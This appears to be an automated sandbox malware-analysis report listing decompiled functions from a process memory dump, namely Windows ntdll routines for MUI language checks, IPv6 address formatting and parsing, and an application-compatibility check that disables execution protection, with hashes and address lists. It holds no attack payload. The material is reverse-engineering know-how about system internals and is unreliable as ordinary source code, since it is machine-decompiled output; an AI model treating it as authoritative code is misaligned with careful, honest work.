                                          0x023487af
                                          0x02391ad3
                                          0x02348b0a
                                          0x02348b0d
                                          0x02348b13
                                          0x02348b19
                                          0x02348b1f
                                          0x02348b25
                                          0x02348b2b
                                          0x02348b31
                                          0x02348b37
                                          0x02348b3d
                                          0x02348b46
                                          0x02348b46
                                          0x023487c6
                                          0x023487d0
                                          0x02391ae0
                                          0x02391ae6
                                          0x02391af8
                                          0x02391af8
                                          0x02391afd
                                          0x02391afe
                                          0x02391b01
                                          0x02391b06
                                          0x02391b06
                                          0x023487d6
                                          0x023487f2
                                          0x023487f7
                                          0x02348807
                                          0x0234880a
                                          0x0234880f
                                          0x02348810
                                          0x02348813
                                          0x02348818
                                          0x02348818
                                          0x0234882c
                                          0x02348831
                                          0x02348838
                                          0x02348908
                                          0x02348920
                                          0x023489f0
                                          0x02348a08
                                          0x02348af6
                                          0x02348af6
                                          0x02348af8
                                          0x02348afb
                                          0x02391beb
                                          0x02391beb
                                          0x02348b04
                                          0x02391bf8
                                          0x02391c0e
                                          0x02391c13
                                          0x02391c16
                                          0x02391c16
                                          0x02391bf8
                                          0x00000000
                                          0x02348b04
                                          0x02348a0e
                                          0x02348a11
                                          0x02348a14
                                          0x02348a15
                                          0x02348a18
                                          0x02348a22
                                          0x02348b59
                                          0x02348a28
                                          0x02348a3c
                                          0x02348a3c
                                          0x02348a42
                                          0x02391bb0
                                          0x02391b11
                                          0x02391b11
                                          0x00000000
                                          0x02348a48
                                          0x02348a51
                                          0x02348a5b
                                          0x02348a5e
                                          0x02348a61
                                          0x02348a69
                                          0x02348a69
                                          0x02348a6d
                                          0x00000000
                                          0x00000000
                                          0x02348a74
                                          0x02348a7c
                                          0x02348a7d
                                          0x02348a91
                                          0x02348a93
                                          0x02348a93
                                          0x02348a98
                                          0x02348a9b
                                          0x02348aa1
                                          0x02348aa1
                                          0x02348aa4
                                          0x02348aaa
                                          0x02348ab1
                                          0x02348ac5
                                          0x02348ac7
                                          0x02348ac7
                                          0x02348ac5
                                          0x02348ace
                                          0x02391bc9
                                          0x02391bce
                                          0x02391bd2
                                          0x02391bd2
                                          0x02348ad8
                                          0x02348aeb
                                          0x02348aeb
                                          0x02348af0
                                          0x02348af4
                                          0x00000000
                                          0x02348af4
                                          0x02348a42
                                          0x02348926
                                          0x02348929
                                          0x0234892c
                                          0x0234892d
                                          0x02348930
                                          0x02348935
                                          0x0234893a
                                          0x02348b51
                                          0x02348940
                                          0x02348954
                                          0x02348954
                                          0x0234895a
                                          0x02391b63
                                          0x00000000
                                          0x02348960
                                          0x02348969
                                          0x02348973
                                          0x02348976
                                          0x02348979
                                          0x0234897e
                                          0x02348981
                                          0x02348981
                                          0x02348986
                                          0x00000000
                                          0x00000000
                                          0x02391b6e
                                          0x02391b74
                                          0x02391b7b
                                          0x02391b8f
                                          0x02391b91
                                          0x02391b91
                                          0x02391b99
                                          0x02391b9c
                                          0x02391ba2
                                          0x02391ba2
                                          0x0234898c
                                          0x02348992
                                          0x02348999
                                          0x023489ad
                                          0x02391ba8
                                          0x02391ba8
                                          0x023489ad
                                          0x023489b6
                                          0x023489c8
                                          0x023489cd
                                          0x023489d0
                                          0x023489d0
                                          0x023489d6
                                          0x023489e8
                                          0x023489e8
                                          0x023489ed
                                          0x00000000
                                          0x023489ed
                                          0x0234895a
                                          0x0234883e
                                          0x02348841
                                          0x02348844
                                          0x02348845
                                          0x02348848
                                          0x0234884d
                                          0x02348852
                                          0x02348b49
                                          0x02348858
                                          0x0234886c
                                          0x0234886c
                                          0x02348872
                                          0x02391b0e
                                          0x00000000
                                          0x02348878
                                          0x02348881
                                          0x0234888b
                                          0x0234888e
                                          0x02348891
                                          0x02348896
                                          0x02348899
                                          0x02348899
                                          0x0234889e
                                          0x00000000
                                          0x00000000
                                          0x02391b21
                                          0x02391b27
                                          0x02391b2e
                                          0x02391b42
                                          0x02391b44
                                          0x02391b44
                                          0x02391b4c
                                          0x02391b4f
                                          0x02391b55
                                          0x02391b55
                                          0x023488a4
                                          0x023488aa
                                          0x023488b1
                                          0x023488c5
                                          0x02391b5b
                                          0x02391b5b
                                          0x023488c5
                                          0x023488ce
                                          0x023488e0
                                          0x023488e5
                                          0x023488e8
                                          0x023488e8
                                          0x023488ee
                                          0x02348900
                                          0x02348900
                                          0x02348905
                                          0x00000000
                                          0x02348905

                                          APIs
                                          Strings
                                          • Kernel-MUI-Language-SKU, xrefs: 023489FC
                                          • Kernel-MUI-Language-Allowed, xrefs: 02348827
                                          • Kernel-MUI-Number-Allowed, xrefs: 023487E6
                                          • WindowsExcludedProcs, xrefs: 023487C1
                                          • Kernel-MUI-Language-Disallowed, xrefs: 02348914
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: _wcspbrk
                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                          • API String ID: 402402107-258546922
                                          • Opcode ID: 64e7f0202c504cd7bfb4fab4d65f89137580a40b91743e30d0333cef992747a8
                                          • Instruction ID: 6390b0c4f308f43781036f2f3238a2366f369d4cc3a91282d11da5fb445e6ebe
                                          • Opcode Fuzzy Hash: 64e7f0202c504cd7bfb4fab4d65f89137580a40b91743e30d0333cef992747a8
                                          • Instruction Fuzzy Hash: 05F1C7B2D00219EFCF61EF99C9809EEB7F9BF08304F1444AAE505A7611EB35AA45DF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 023613CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 38%
                                          			E023613CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E02357707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x2322926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E02357707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x2329cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E02357707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E02357707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E02357707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E02357707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                          0x023613d5
                                          0x023613d9
                                          0x023613dc
                                          0x023613de
                                          0x023613e1
                                          0x023613e8
                                          0x023613ee
                                          0x0238e8fd
                                          0x00000000
                                          0x0238e921
                                          0x0238e921
                                          0x0238e928
                                          0x0238e982
                                          0x0238e98a
                                          0x00000000
                                          0x0238e99a
                                          0x0238e99e
                                          0x0238e9a3
                                          0x0238e9a8
                                          0x0238e9b9
                                          0x0238e978
                                          0x00000000
                                          0x0238e978
                                          0x0238e98a
                                          0x0238e92a
                                          0x0238e931
                                          0x0238e944
                                          0x0238e944
                                          0x0238e950
                                          0x0238e954
                                          0x0238e959
                                          0x0238e95e
                                          0x0238e963
                                          0x0238e970
                                          0x00000000
                                          0x0238e975
                                          0x0238e93b
                                          0x0238e980
                                          0x00000000
                                          0x0238e980
                                          0x0238e942
                                          0x0238e94b
                                          0x00000000
                                          0x0238e94b
                                          0x00000000
                                          0x0238e942
                                          0x023613f4
                                          0x023613f4
                                          0x023613f9
                                          0x023613fc
                                          0x023613ff
                                          0x02361406
                                          0x0238e9cc
                                          0x0238e9d2
                                          0x0238e9d2
                                          0x0238e9cc
                                          0x0236140c
                                          0x02361411
                                          0x02361431
                                          0x0236143a
                                          0x0236143c
                                          0x0236143f
                                          0x0236143f
                                          0x02361442
                                          0x02361447
                                          0x023614a8
                                          0x023614ac
                                          0x0238e9e2
                                          0x0238e9e7
                                          0x0238e9ec
                                          0x0238ea05
                                          0x0238ea05
                                          0x00000000
                                          0x02361449
                                          0x00000000
                                          0x02361449
                                          0x0236144c
                                          0x02361459
                                          0x02361462
                                          0x02361469
                                          0x0236146a
                                          0x02361470
                                          0x02361473
                                          0x02361476
                                          0x02361476
                                          0x02361490
                                          0x02361495
                                          0x0236138e
                                          0x02361390
                                          0x02361397
                                          0x02361398
                                          0x02361399
                                          0x023613a1
                                          0x023613a4
                                          0x023613a4
                                          0x02361498
                                          0x0236149c
                                          0x0236149f
                                          0x023614a2
                                          0x00000000
                                          0x00000000
                                          0x023614a4
                                          0x00000000
                                          0x023614a4
                                          0x02361413
                                          0x02361415
                                          0x02361416
                                          0x02361419
                                          0x0236141c
                                          0x02361422
                                          0x023613b7
                                          0x023613bc
                                          0x023613bf
                                          0x023613bf
                                          0x023613c2
                                          0x02361424
                                          0x02361424
                                          0x02361424
                                          0x02361427
                                          0x0236142b
                                          0x0236142c
                                          0x0236142c
                                          0x0236142c
                                          0x00000000
                                          0x0236141c
                                          0x02361411

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          • Opcode ID: d17e2f6952d03ec9b894437e7d7300d4c80f34af61e47e2789afedca48065223
                                          • Instruction ID: 51ca74e02914d09ce333e5e0598337e8b100b7ef19e9dba66660039c616afa3c
                                          • Opcode Fuzzy Hash: d17e2f6952d03ec9b894437e7d7300d4c80f34af61e47e2789afedca48065223
                                          • Instruction Fuzzy Hash: 4A613671E00665AACF35DF59C8849BFBBB9EF84300B18C02EF4DA47A44D374A640DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02357EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 64%
                                          			E02357EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x2402088; // 0x76a365d9
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E02357F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E02373F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E0232DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x2404218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E02373F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E02330D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E02373F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E02338375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E02373F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0239E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E02373F92();
					_t38 = 1;
					L2:
					return E0232E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                          0x02357f08
                                          0x02357f0f
                                          0x02357f12
                                          0x02357f1b
                                          0x02357f31
                                          0x02373ead
                                          0x02373eb4
                                          0x00000000
                                          0x00000000
                                          0x02373eba
                                          0x02373ecd
                                          0x02373ed2
                                          0x02373ee1
                                          0x02373ee7
                                          0x02373eec
                                          0x02373f12
                                          0x02373f18
                                          0x02373f1a
                                          0x00000000
                                          0x00000000
                                          0x02373f20
                                          0x02373f26
                                          0x02373f28
                                          0x00000000
                                          0x00000000
                                          0x02373f2e
                                          0x02373f30
                                          0x00000000
                                          0x00000000
                                          0x02373f3a
                                          0x02373f3b
                                          0x02373f53
                                          0x02373f64
                                          0x02373f69
                                          0x02373f6c
                                          0x02373f6d
                                          0x02373f6f
                                          0x0237e304
                                          0x0237e30f
                                          0x0237e315
                                          0x0237e31e
                                          0x0237e321
                                          0x0237e327
                                          0x0237e329
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0237e32f
                                          0x0237e32f
                                          0x0237e337
                                          0x0237e33a
                                          0x0237e33b
                                          0x0237e33d
                                          0x0237e33f
                                          0x0237e341
                                          0x0237e341
                                          0x0237e34e
                                          0x0237e353
                                          0x0237e358
                                          0x0237e35d
                                          0x0237e35f
                                          0x00000000
                                          0x00000000
                                          0x0237e365
                                          0x0237e365
                                          0x0237e368
                                          0x0237e36e
                                          0x00000000
                                          0x00000000
                                          0x0237e374
                                          0x0237e32f
                                          0x02373f75
                                          0x02373f7a
                                          0x02373f7c
                                          0x02373f7e
                                          0x02373f86
                                          0x02357f39
                                          0x02357f47
                                          0x02357f47
                                          0x02357f37
                                          0x02357f37
                                          0x00000000

                                          APIs
                                          • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02373F12
                                          Strings
                                          • ExecuteOptions, xrefs: 02373F04
                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02373F75
                                          • Execute=1, xrefs: 02373F5E
                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0237E2FB
                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02373F4A
                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 0237E345
                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02373EC4
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: BaseDataModuleQuery
                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                          • API String ID: 3901378454-484625025
                                          • Opcode ID: 044d6f474f1482a0d6dec39854c6285df212320c62ef0de0529cdd381fe2625d
                                          • Instruction ID: 440683af09293734900b73d0100c570b5dc56fa3a823cd56e0fdfcaffe620480
                                          • Opcode Fuzzy Hash: 044d6f474f1482a0d6dec39854c6285df212320c62ef0de0529cdd381fe2625d
                                          • Instruction Fuzzy Hash: 7E41977268032C7AEF30DA94DCC5FEBB3BDAB54704F0045A9E909E6181E770EA459F61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02360B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E02360B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E02338980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E0232DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E02360CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E02360CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E023606BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E023606BA(_t135, _t178) == 0 || E02360A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E02360CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E02360CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E023606BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E023606BA(_t124, _t142) == 0 || E02360A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                          0x02360b21
                                          0x02360b24
                                          0x02360b27
                                          0x02360b2a
                                          0x02360b2d
                                          0x02360b30
                                          0x02360b33
                                          0x02360b36
                                          0x02360b39
                                          0x02360b3e
                                          0x02360c65
                                          0x02360c68
                                          0x02360c6a
                                          0x02360c6f
                                          0x0238eb42
                                          0x00000000
                                          0x00000000
                                          0x0238eb48
                                          0x0238eb48
                                          0x02360c75
                                          0x02360c7a
                                          0x0238eb54
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0238eb5a
                                          0x02360c80
                                          0x02360c84
                                          0x0238eb98
                                          0x00000000
                                          0x00000000
                                          0x0238eba6
                                          0x02360cb8
                                          0x02360cba
                                          0x02360cd3
                                          0x02360cda
                                          0x02360ce4
                                          0x02360ce9
                                          0x00000000
                                          0x02360cec
                                          0x02360c8c
                                          0x0238eb63
                                          0x00000000
                                          0x00000000
                                          0x0238eb70
                                          0x0238eb75
                                          0x0238eb7d
                                          0x00000000
                                          0x00000000
                                          0x0238eb8c
                                          0x00000000
                                          0x0238eb8c
                                          0x02360c96
                                          0x00000000
                                          0x00000000
                                          0x02360ca2
                                          0x02360cac
                                          0x02360cb4
                                          0x00000000
                                          0x00000000
                                          0x02360b44
                                          0x02360b47
                                          0x02360b49
                                          0x00000000
                                          0x00000000
                                          0x02360b4f
                                          0x02360b50
                                          0x00000000
                                          0x00000000
                                          0x02360b56
                                          0x02360b62
                                          0x02360b7c
                                          0x02360bac
                                          0x02360a0f
                                          0x0238eaaa
                                          0x00000000
                                          0x0238eac4
                                          0x0238eac4
                                          0x02360bd0
                                          0x02360bd0
                                          0x02360bd4
                                          0x02360bd9
                                          0x00000000
                                          0x00000000
                                          0x02360bdb
                                          0x02360be0
                                          0x0238eb0e
                                          0x02360a1a
                                          0x00000000
                                          0x02360a1a
                                          0x0238eb1a
                                          0x0238eb1f
                                          0x0238eb27
                                          0x00000000
                                          0x00000000
                                          0x0238eb36
                                          0x00000000
                                          0x0238eb36
                                          0x02360bea
                                          0x00000000
                                          0x00000000
                                          0x02360bf6
                                          0x02360c00
                                          0x02360c03
                                          0x02360c0b
                                          0x00000000
                                          0x02360c0b
                                          0x0238eaaa
                                          0x00000000
                                          0x02360a15
                                          0x02360bb6
                                          0x00000000
                                          0x02360bc6
                                          0x02360bc6
                                          0x02360bcb
                                          0x02360c15
                                          0x00000000
                                          0x00000000
                                          0x02360c1d
                                          0x02360c20
                                          0x02360c21
                                          0x02360c24
                                          0x02360c24
                                          0x02360c26
                                          0x00000000
                                          0x02360c26
                                          0x02360bcd
                                          0x00000000
                                          0x02360bcd
                                          0x02360b89
                                          0x02360b89
                                          0x02360b90
                                          0x00000000
                                          0x00000000
                                          0x02360b96
                                          0x00000000
                                          0x02360b96
                                          0x02360a04
                                          0x02360a04
                                          0x02360b9a
                                          0x02360b9a
                                          0x02360b9b
                                          0x02360b9f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x02360ba5
                                          0x02360ac7
                                          0x02360aca
